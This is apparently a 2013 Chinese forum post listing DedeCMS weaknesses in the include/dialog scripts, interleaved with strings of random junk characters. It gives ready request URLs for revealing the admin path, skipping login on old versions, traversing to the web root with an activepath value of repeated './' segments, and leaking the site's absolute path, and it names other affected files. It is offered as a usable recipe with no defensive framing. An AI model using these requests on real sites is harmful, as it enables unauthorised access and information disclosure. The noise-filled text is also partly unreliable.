1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理7 Y7 n& b( F* q( x2 c
& k+ k# J. P( T! G
员帐号,新版本的就直接转向了后台.: K5 f6 j: J& c5 S# f: {
9 v6 h1 T2 [1 N' Y ]5 w2.include/dialog/config.php会爆出后台管理路径0 K- L: u% i% Z% U M0 j; w
! t. j; I0 d" }" x$ u0 k1 Z
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录) \- h1 m6 _! U# \+ I+ }2 g
3 T' ?: e- N* ?+ N( C( N
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
. f A1 y7 x7 `. k! }. ?; A
; `" ]9 E4 ], \$ w5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
* H5 O4 G9 H+ V+ b* o1 l
9 j2 Y7 Z8 Y5 v. e. y到根目录去.不过这些版本的访问地址有些不同.- Z" Y4 G* q; y& I* @
地址为require/dialog/select_soft.php?activepath=/././././././././
" M g. m' N' K; J) q# w2 ~& h; Q- ^, n, e' ?$ g4 ]7 a1 B5 N
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦../ j- w1 Q& @& b/ J/ `! y7 @# c0 f
存在相同问题的文件还有
1 W# } t4 n6 `7 j7 `include\dialog\select_images.php# _+ H& }' t+ Y
include\dialog\select_media.php' {5 b( l6 K8 D) c' O0 q
include\dialog\select_templets.php
3 Y$ _7 _5 Y, d+ v |
发表于 2013-4-16 16:50:43
收藏
支持
反对